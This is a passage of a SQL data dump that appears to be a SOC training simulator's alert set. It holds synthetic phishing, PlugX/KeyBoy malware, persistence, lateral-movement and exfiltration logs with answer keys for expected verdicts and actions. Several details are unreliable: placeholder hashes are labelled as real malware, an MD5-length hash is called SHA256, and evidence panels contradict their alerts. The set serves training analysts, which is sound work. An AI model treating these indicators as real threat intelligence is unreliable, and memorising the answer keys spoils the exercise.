3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:56:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1169, 'Initial Access via COVID-19 Phishing Email', 'medium', 'Email Gateway Logs', 'A phishing email with a COVID-19 themed subject was detected. The email contained a malicious attachment intended to deceive the recipient into opening it, thereby gaining initial access to the network. This tactic is commonly associated with the Mustang Panda APT group.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"covid-alerts@healthupdate.org\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: COVID-19 Workplace Safety Guidelines\",\"attachment\":{\"filename\":\"COVID-19_Guidelines.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"user\":\"jdoe\",\"email_gateway\":\"smtp.company.com\"}', '2026-02-07 21:21:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mustang Panda malware.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"covid-alerts@healthupdate.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no legitimate history.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"COVID-19_Guidelines.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains macros that execute PowerShell scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via COVID-19 Phishing Email\",\"date\":\"2026-02-08T19:00:02.439Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1170, 'Execution of PlugX Malware', 'high', 'Endpoint Detection and Response (EDR) System', 'The PlugX malware was executed on the victim\'s machine following the opening of a malicious attachment. The malware is designed to evade detection and establish a foothold in the system.', 'Malware Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:11Z\",\"event_id\":\"EDR-20231015-00345\",\"machine_name\":\"victim-pc\",\"user\":\"jdoe\",\"file_executed\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\plugx_launcher.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"source_ip\":\"192.168.1.105\",\"attacker_ip\":\"203.0.113.45\",\"process_id\":4567,\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\plugx_launcher.exe\\\" --silent\",\"parent_process\":\"explorer.exe\"}', '2026-02-07 21:21:20', '2026-02-23 11:38:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with PlugX malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for PlugX\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"internal\",\"details\":\"Employee of the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1171, 'Establishing Persistence and Data Exfiltration', 'high', 'Network Traffic Analysis', 'With PlugX now active, Mustang Panda attempts to establish persistence on the network and initiate data exfiltration. The network traffic from IP 192.168.1.102 to 203.0.113.25 indicates unauthorized data exfiltration attempts. The presence of the PlugX malware with hash \'e99a18c428cb38d5f260853678922e03\' confirms the persistence mechanism.', 'Persistence and Exfiltration', 'TA0003, TA0010', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T12:45:00Z\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":80,\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"plugx_loader.exe\",\"user\":\"jdoe\",\"event\":\"Data Exfiltration Detected\",\"details\":\"Data transfer of 50MB to external IP 203.0.113.25 using encrypted channel.\"}', '2026-02-07 21:21:20', '2026-02-23 17:38:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server used by Mustang Panda.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash associated with PlugX malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"plugx_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Executable used by PlugX malware for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username of a potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1172, 'Initial Access via Phishing Email', 'high', 'Email security gateway logs', 'Detected a spear-phishing attempt targeting internal user via a malicious Microsoft Office document exploiting a known vulnerability. The email originated from a suspicious external IP and included a compromised document with a known malware hash.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T10:15:30Z\",\"email_id\":\"abc123xyz\",\"from\":\"attacker@example.com\",\"to\":\"victim@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.22\",\"user\":\"victim@company.com\",\"action\":\"quarantined\"}', '2026-02-07 21:21:24', '2026-02-23 11:19:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KeyBoy malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-08T19:00:02.454Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1173, 'Malicious Macro Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon opening the malicious document, users unknowingly trigger a macro that executes a script, allowing KeyBoy to install a backdoor on the compromised system.', 'Execution', 'T1203', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-04T14:22:18Z\",\"event_id\":\"12345\",\"user\":\"john.doe\",\"user_domain\":\"CORP\",\"host\":\"DESKTOP-5G7H3J4\",\"file_name\":\"Invoice_2023.docm\",\"file_hash\":\"3f7a6bdf1c8b9e7e2c8d7f6a0b3a9e5c\",\"process_name\":\"WINWORD.EXE\",\"process_id\":9876,\"command_line\":\"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\\\" Invoice_2023.docm\",\"network_activity\":[{\"destination_ip\":\"192.168.1.25\",\"destination_port\":80,\"protocol\":\"HTTP\"},{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\"}],\"external_ip\":\"203.0.113.45\",\"malicious_macro\":true}', '2026-02-07 21:21:24', '2026-02-23 11:21:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Corporate user\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Invoice_2023.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File contains a known malicious macro\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7a6bdf1c8b9e7e2c8d7f6a0b3a9e5c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as associated with KeyBoy\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for KeyBoy malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1174, 'Persistence through Registry Modification', 'medium', 'Registry change monitoring alerts', 'KeyBoy modifies registry keys to maintain persistence, ensuring their backdoor survives system reboots and remains hidden from basic security scans. Detected modification in registry to include malicious script for persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_time\":\"2023-10-12T14:32:45Z\",\"event_type\":\"registry_modification\",\"user\":\"jdoe\",\"user_id\":\"S-1-5-21-3456789012-3456789012-1234567890-1001\",\"src_ip\":\"192.168.1.10\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousScript\",\"registry_value\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\",\"hash\":\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\",\"external_ip\":\"203.0.113.45\",\"action\":\"create\",\"process_name\":\"regedit.exe\",\"process_id\":5184,\"file_path\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\"}', '2026-02-07 21:21:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as malware associated with KeyBoy APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Malicious script used for persistence by KeyBoy.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User account used for registry modification.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1175, 'Lateral Movement using RDP', 'high', 'Network traffic analysis', 'KeyBoy APT group utilized stolen credentials to exploit Remote Desktop Protocol (RDP) for lateral movement across the network. The activity was detected targeting media organizations and NGOs, with the objective of gaining control over additional systems.', 'Lateral Movement', 'T1021.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"event_id\":\"4624\",\"logon_type\":\"10\",\"auth_package\":\"Negotiate\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"KeyBoy_RDP_Exploit.exe\",\"description\":\"Successful remote logon using RDP with potentially compromised credentials.\"}', '2026-02-07 21:21:24', '2026-02-23 11:22:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with KeyBoy APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Credential potentially compromised; used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KeyBoy RDP exploitation tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"KeyBoy_RDP_Exploit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename identified as part of KeyBoy\'s lateral movement toolkit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1176, 'Data Exfiltration to Remote Server', 'high', 'Outbound network traffic logs', 'With access established, KeyBoy begins exfiltrating sensitive documents and communications to a remote server, compromising the integrity and confidentiality of the targeted organizations.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.0.15\",\"source_port\":443,\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"http_method\":\"POST\",\"uri\":\"/upload\",\"filename\":\"confidential_docs.zip\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"username\":\"jdoe\",\"transaction_id\":\"abc123def456\",\"file_size\":1048576}', '2026-02-07 21:21:24', '2026-02-23 11:37:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by KeyBoy APT\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware-related 